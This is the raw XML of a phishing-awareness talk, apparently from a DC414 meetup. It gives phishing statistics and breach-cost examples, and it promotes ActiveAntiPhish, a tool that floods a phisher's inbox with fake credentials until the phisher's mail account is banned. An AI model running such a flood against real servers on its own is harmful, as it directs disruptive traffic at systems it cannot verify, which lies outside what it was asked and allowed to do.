            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>when it reaches the daily limit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>That’s 1 e-mail per second, for every minute of 24 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Or 86,400 e-mails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yeah, let’s rapidly have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>the spammer’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>send 86,400 e-mails.  From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proxied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: server is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>banned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> for 24 hours on first offense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3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08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686800" cy="6397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What this does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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phisher probably loses ability to collect any more logs for 24 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Their inbox is full of fake credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In that 24 hours, we can contact webhosts/domain registrars to get the site taken down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The phishers will probably just abandon that account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note: because the fake traffic is generated by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phisher’s site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveAntiPhish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is not likely to get banned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3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9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686800" cy="6397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Where do I get this glory?!?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447799"/>
            <a:ext cx="3810000" cy="432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9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686800" cy="6397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Take a picture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85800" y="1524000"/>
            <a:ext cx="10363200" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GitHub!!   Again, this is NOT MINE, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credit to them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/LogoiLab/ActiveAntiPhish</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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4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4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Article: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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>computeco.de/2018-06-16_1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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48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Well that’s just about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I’m a fan of this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>intertubez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> thing, so find me @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>ulicbelouve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>My </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> repo of stuff is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/belouve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Come check out DC414 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>dc414.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>This…you’re already here.  Just come back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Also, go #YOLOSEC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8340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686800" cy="6397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Phishing Defined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457200" y="1524000"/>
            <a:ext cx="8915400" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“Practice of sending emails appearing to be from reputable sources with the goal of influencing or gaining personal information”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hadnagy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, CEO and Founder of Social-	Engineer, LLC; Innocent Lives Foundation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45484D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="45484D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="26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Arial"/>
              </a:rPr>
              <a:t>Not all the information is scary, and there is some good stuff at the end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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537801"/>
            <a:ext cx="2819400" cy="301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97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686800" cy="6397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Company Security- Some Phishing Facts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457200" y="1524000"/>
            <a:ext cx="7772400" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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1350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Over half of internet users get at least 1 phishing e-mail per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Over 100 billion spam emails are sent each day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Average phishing costs 1.6 MILLION USD per incident</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The average large company – lost $3.7 MILLION per year to phishing alone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Targeted CEO attacks in US costing $246 million annually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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619501"/>
            <a:ext cx="3289300" cy="272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55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686800" cy="6397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Some Big Breaches and Costs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62" y="1066800"/>
            <a:ext cx="10065368" cy="510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89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686800" cy="6397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Costs – Recent Examples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457200" y="1524000"/>
            <a:ext cx="7772400" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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1350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Phishing attack just before payday</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Phish creds, then access employee’s payroll preferences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Views W2, and then changes the direct deposit information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Based in Africa or Eastern Europe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>This can cause financial disruption to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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514600"/>
            <a:ext cx="3964273" cy="31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19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686800" cy="6397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Phishin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g Statistics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85800" y="1524000"/>
            <a:ext cx="9067800" cy="44957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75" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Statistics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="778506" lvl="2" indent="-300038"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verizon DBIR report – Humans used as vectors for attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some scary statistics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How long until someone first clicks on it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How long until someone reports it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="641350" lvl="1" indent="-300038"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Very quick to infect, very long to detect or fix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412755" indent="-300038"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So how are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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1844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686800" cy="6397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Some stats from $employer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85800" y="1524000"/>
            <a:ext cx="9067800" cy="4495798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182875" indent="-1828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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="18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11470" indent="-182875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Wingdings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2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31502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58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051534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690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56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41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indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who falls for it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Employer overall – 8% fall for it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our practice – 14% fall for it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Who reports it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Employer overall – 26% report it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our practice – 62% report it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How quickly is it reported:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Globally – First report: 28 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Employer overall – First report: 11 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515933" lvl="1" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our practice – First report: 15 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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7906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686800" cy="639762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Rubik’s Cat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85800" y="1524000"/>
            <a:ext cx="9067800" cy="44957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75" indent="-182875" algn="l" defTabSz="91437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Font typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800" b="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11470" indent="-182875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Wingdings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2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31502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8658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Font typeface="Wingdings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051534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690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566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41" indent="-137157" algn="l" defTabSz="914377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 indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How am I to know what not to fall for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="287338" indent="-287338"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How can my company get better?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228595" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="7D8791"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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437" y="3072318"/>
            <a:ext cx="3738563" cy="349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97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1130</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>171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Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
